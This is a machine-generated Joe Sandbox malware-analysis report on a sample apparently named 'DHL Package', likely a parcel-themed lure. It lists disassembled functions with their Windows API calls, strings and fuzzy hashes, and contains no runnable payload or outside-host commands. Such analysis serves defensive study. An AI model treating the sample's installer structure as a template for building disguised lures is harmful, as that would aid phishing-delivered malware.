Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88072019ed6465e71e2fa1434d48e474bb47f2ee53db3a6664b51f620b04a4d
Instruction ID: 7dff751720dadafb211fd447936b4354dee758e46890fa97403eee704ee6feb6
Opcode Fuzzy Hash: e88072019ed6465e71e2fa1434d48e474bb47f2ee53db3a6664b51f620b04a4d
Instruction Fuzzy Hash: AFC1A1B4E01218CFEB54DFA5C994B9DBBB2BF89301F2081AAD809A7355DB345E85CF50

Function 3938DCF0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c56fda889da1793ab04fe959675b77fe8fb33d0db3b3013c7e702ec4ff5113
Instruction ID: 85648e4c6b836d6f6f8e54692c26918c0acc2f0df9ea8b6b0613a2da611e26e2
Opcode Fuzzy Hash: c5c56fda889da1793ab04fe959675b77fe8fb33d0db3b3013c7e702ec4ff5113
Instruction Fuzzy Hash: 94C1C3B4E01218CFEB54DFA5C990B9DBBB2BF89300F2091A9D408AB355DB355E85CF50

Function 3938F700 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26296250977f501663424520164fd506b02cbd38dbd8d84cfa15782f0850c2c5
Instruction ID: 936248d9dd30a898fe28e109acd7eeb6e987870217dbd4a1b5a26594c685a621
Opcode Fuzzy Hash: 26296250977f501663424520164fd506b02cbd38dbd8d84cfa15782f0850c2c5
Instruction Fuzzy Hash: FBC1B274E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD409AB355DB385E85CF50

Function 3938FB58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e19236c50700ad9c686289d2563c0ac63e1953631387f5b37aa9f2833137ee5
Instruction ID: fa745fa22aecd47b2903800bfbf3f43d3dee898722d90d56703b00deae57c222
Opcode Fuzzy Hash: 2e19236c50700ad9c686289d2563c0ac63e1953631387f5b37aa9f2833137ee5
Instruction Fuzzy Hash: E0C1D374E05218CFEB54DFA5C994B9DBBB2BF89300F2091A9D808AB355DB345E85CF50

Function 3938EE50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392c44a37a72f16ecf2e589b83bbc137851bdaaf5150c5015f53955fbdce1c02
Instruction ID: 046ba97cd82ee80770ab8f026c4ade82b7faf4d722a76ad2dfa9b12081537edd
Opcode Fuzzy Hash: 392c44a37a72f16ecf2e589b83bbc137851bdaaf5150c5015f53955fbdce1c02
Instruction Fuzzy Hash: 22C1B374E01218CFEB54DFA5C994B9DBBB2BF89300F2091A9D408AB355DB355E85CF50

Function 3938F2A8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76609c569c19ec9cf559109243acc8ae7e7509c7218042b45bf1a4f4fd3a5a8
Instruction ID: d7535eee75f2dd3b8ae34894dddefd78e7ceeb55b103e8a159aea71f90bdbdc1
Opcode Fuzzy Hash: d76609c569c19ec9cf559109243acc8ae7e7509c7218042b45bf1a4f4fd3a5a8
Instruction Fuzzy Hash: 2BC1C3B4E01218CFEB54DFA5C994B9DBBB2BF89300F2091AAD408AB355DB355E85CF50

Function 393A5AB8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4383f15f8205718a32bd0dba936681faca38375e348e8cd570ea0eae967d6606
Instruction ID: 593435db52b6564f9fc6151d98daeb5d95fa9762bcd8cf8c76226fc3912f47be
Opcode Fuzzy Hash: 4383f15f8205718a32bd0dba936681faca38375e348e8cd570ea0eae967d6606
Instruction Fuzzy Hash: 45B17274E10218CFDB54DFA9C884A9DFBB2FF89314F2081A9D819AB365DB34A941CF54

Function 393A5AA7 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0bdec056bb6cc41ed697fde4c4c65ed895a5d1215569870226b578d46a8fc7
Instruction ID: e46c52d981522061da03c129c7287565ea1dff5cf1b3e2c8704f4c9ae1be6579
Opcode Fuzzy Hash: fa0bdec056bb6cc41ed697fde4c4c65ed895a5d1215569870226b578d46a8fc7
Instruction Fuzzy Hash: 915182B4E006488FDB08DFAAC484A9DFBF2FF89310F248169D409AB365D7349942CF50

Function 3938DA58 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c0dbe4a9d7524e3414d66ed4e4b72e2f258ea5782714954696c05a0fbbfa62
Instruction ID: 8a590a2098995edf47895126956b473bf2127e039bffc27c704cefcf69666f7b
Opcode Fuzzy Hash: 71c0dbe4a9d7524e3414d66ed4e4b72e2f258ea5782714954696c05a0fbbfa62
Instruction Fuzzy Hash: AC41AEB4D022199FDB00CFA8D594BAEBBF1BF49304F5454A9E410BB390E7789A44CF94

Function 39AC23FA Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337ae8999b7d5f3870dda4fdd57ec90a7c323a530871debac6627c3addae9bb1
Instruction ID: 62aeaaae845d6417838e1837cc68e4dcfa43cbfd4ae7f2e0a75f54a6349b077a
Opcode Fuzzy Hash: 337ae8999b7d5f3870dda4fdd57ec90a7c323a530871debac6627c3addae9bb1
Instruction Fuzzy Hash: 00D06739D04218DBCB10EFA5A9411EDB3B0AB96301F1065A6991CBB111DB309A64CF86

Function 00405582 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055E0
GetDlgItem.USER32(?,000003EE), ref: 004055EF
GetClientRect.USER32(?,?), ref: 0040562C
GetSystemMetrics.USER32(00000002), ref: 00405633
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
ShowWindow.USER32(?,00000008), ref: 004056CF
GetDlgItem.USER32(?,000003EC), ref: 004056F0
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
GetDlgItem.USER32(?,000003F8), ref: 004055FE

Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374

GetDlgItem.USER32(?,000003EC), ref: 00405742
CreateThread.KERNEL32(00000000,00000000,Function_00005516,00000000), ref: 00405750
CloseHandle.KERNEL32(00000000), ref: 00405757
ShowWindow.USER32(00000000), ref: 0040577B
ShowWindow.USER32(?,00000008), ref: 00405780
ShowWindow.USER32(00000008), ref: 004057CA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
CreatePopupMenu.USER32 ref: 0040580F
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
GetWindowRect.USER32(?,?), ref: 00405843
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
OpenClipboard.USER32(00000000), ref: 004058A4
EmptyClipboard.USER32 ref: 004058AA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
GlobalLock.KERNEL32(00000000), ref: 004058C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
GlobalUnlock.KERNEL32(00000000), ref: 004058F4
SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
CloseClipboard.USER32 ref: 00405905

Strings

{, xrefs: 004057E8

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
Opcode Fuzzy Hash: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

Function 00404D9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DB5
GetDlgItem.USER32(?,00000408), ref: 00404DC2
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
DeleteObject.GDI32(00000110), ref: 00404E9F
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1

Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374

SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
ShowWindow.USER32(?,00000005), ref: 00405001
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
ImageList_Destroy.COMCTL32(?), ref: 004051D5
GlobalFree.KERNEL32(?), ref: 004051E5
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
SendMessageW.USER32(?,00001102,?,?), ref: 00405307
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
ShowWindow.USER32(?,00000000), ref: 0040538E
GetDlgItem.USER32(?,000003FE), ref: 00405399
ShowWindow.USER32(00000000), ref: 004053A0

Strings

N, xrefs: 0040503D
M, xrefs: 00404F59
, xrefs: 00405378

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
Opcode Fuzzy Hash: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58

Function 00403E58 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
ShowWindow.USER32(?), ref: 00403EB1
DestroyWindow.USER32 ref: 00403EC5
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
GetDlgItem.USER32(?,?), ref: 00403F02
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
IsWindowEnabled.USER32(00000000), ref: 00403F1D
GetDlgItem.USER32(?,00000001), ref: 00403FCB
GetDlgItem.USER32(?,00000002), ref: 00403FD5
SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
GetDlgItem.USER32(?,00000003), ref: 004040E6
ShowWindow.USER32(00000000,?), ref: 00404107
EnableWindow.USER32(?,?), ref: 00404119
EnableWindow.USER32(?,?), ref: 00404134
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414A
EnableMenuItem.USER32(00000000), ref: 00404151
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404169
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040417C
lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004041A6
SetWindowTextW.USER32(?,00423708), ref: 004041BA
ShowWindow.USER32(?,0000000A), ref: 004042EE

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
Instruction ID: 0a9eb52b79e7a1f6ac08be675ff74ca1e342e547d7f0445f300758720cde36e9
Opcode Fuzzy Hash: 6408e53a87cf1860f001efbcdeb721020d56bb7a1b3f7ff22a8272be9afdac83
Instruction Fuzzy Hash: 0EC1D0B1600305EBDB216F62ED88D2A3A78FB95745F51053EFA42B11F0CB794852DB2D

Function 00403AAA Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD

lstrcatW.KERNEL32(00437000,00423708), ref: 00403B2B
lstrlenW.KERNEL32(004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,77163420), ref: 00403BAB
lstrcmpiW.KERNEL32(004281B8,.exe,004281C0,?,?,?,004281C0,00000000,00435800,00437000,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403BBE
GetFileAttributesW.KERNEL32(004281C0), ref: 00403BC9
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C12

Part of subcall function 00406322: wsprintfW.USER32 ref: 0040632F

RegisterClassW.USER32(004291C0), ref: 00403C4F
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C67
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C9C
ShowWindow.USER32(00000005,00000000), ref: 00403CD2
GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403CFE
GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403D0B
RegisterClassW.USER32(004291C0), ref: 00403D14
DialogBoxParamW.USER32(?,00000000,00403E58,00000000), ref: 00403D33

Strings

RichEd32, xrefs: 00403CE6
RichEd20, xrefs: 00403CD8
.exe, xrefs: 00403BB8
.DEFAULT\Control Panel\International, xrefs: 00403B16
RichEdit20W, xrefs: 00403CF6, 00403CFC
Control Panel\Desktop\ResourceLocale, xrefs: 00403ADE
_Nb, xrefs: 00403C2E, 00403C96
RichEdit, xrefs: 00403D05

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
Instruction ID: a24d2e849b10ad8e1ed533e9d37a820f5d0e6b510d4fa7617ff35d8301a60578
Opcode Fuzzy Hash: decbffab92dab6520bd046f472a583eea2a16f8f1dbb073b8dd3dcaf5466dc19
Instruction Fuzzy Hash: E761B670244600BAD720AF669D45E2B3A7CEB84B0AF40457FFD41B62E2DB7D5912CA2D

Function 004044F0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040458E
GetDlgItem.USER32(?,000003E8), ref: 004045A2
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045BF
GetSysColor.USER32(?), ref: 004045D0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
lstrlenW.KERNEL32(?), ref: 004045F1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
GetDlgItem.USER32(?,0000040A), ref: 0040466C
SendMessageW.USER32(00000000), ref: 00404673
GetDlgItem.USER32(?,000003E8), ref: 0040469E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
SetCursor.USER32(00000000), ref: 004046F2
LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
SetCursor.USER32(00000000), ref: 0040470E
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F

Strings

N, xrefs: 0040468C
gD@, xrefs: 004046FA

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$gD@
API String ID: 3103080414-2715828072
Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4

Function 00406027 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B

Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
wsprintfA.USER32 ref: 004060A6
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
GlobalFree.KERNEL32(00000000), ref: 0040618F
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196

Part of subcall function 00405ED1: GetFileAttributesW.KERNEL32(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
Part of subcall function 00405ED1: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7

Strings

[Rename], xrefs: 00406110, 00406122
%ls=%ls, xrefs: 0040609C

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
Opcode Fuzzy Hash: 970157a173da4570010cddf6c99c5fbc205b5ab986513503a6189d6a5da247a7
Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD

Function 00404822 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404871
SetWindowTextW.USER32(00000000,?), ref: 0040489B
SHBrowseForFolderW.SHELL32(?), ref: 0040494C
CoTaskMemFree.OLE32(00000000), ref: 00404957
lstrcmpiW.KERNEL32(004281C0,00423708,00000000,?,?), ref: 00404989
lstrcatW.KERNEL32(?,004281C0), ref: 00404995
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049A7

Part of subcall function 00405A25: GetDlgItemTextW.USER32(?,?,00000400,004049DE), ref: 00405A38

Part of subcall function 0040668A: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77163420,00437800,00435000,0040346A,00437800,00437800,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
Part of subcall function 0040668A: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
